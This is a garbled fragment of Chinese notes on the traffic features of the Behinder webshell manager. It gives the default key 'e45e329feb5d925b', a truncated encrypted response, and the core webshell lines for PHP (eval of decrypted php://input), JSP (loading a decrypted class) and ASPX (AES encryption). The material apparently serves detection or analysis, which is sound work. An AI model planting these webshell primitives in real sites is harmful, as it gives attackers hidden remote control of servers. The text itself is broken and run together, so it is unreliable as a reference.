e45e329feb5d925b下有如下特征:TxcWR1NNExZAD0ZaAWMIPAZjH1BFBFtHThcJSlUXWEd 解密出来是{"status":"c3VjY2Vzcw==","msg":"另外:冰蝎管理webshell管理方式是,通过加载器加载post输入流中的恶意类实现的,这也是请求包很大的原因。
php
e45e329feb5d925bevalDecrypt(file_get_contents("php://input"))jsp
this.getClass().getClassLoader()).g(Decrypt(bos.toByteArray())).newInstance().equals(pageContext)equals(pageContext)e45e329feb5d925baspx
e45e329feb5d925bSystem.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));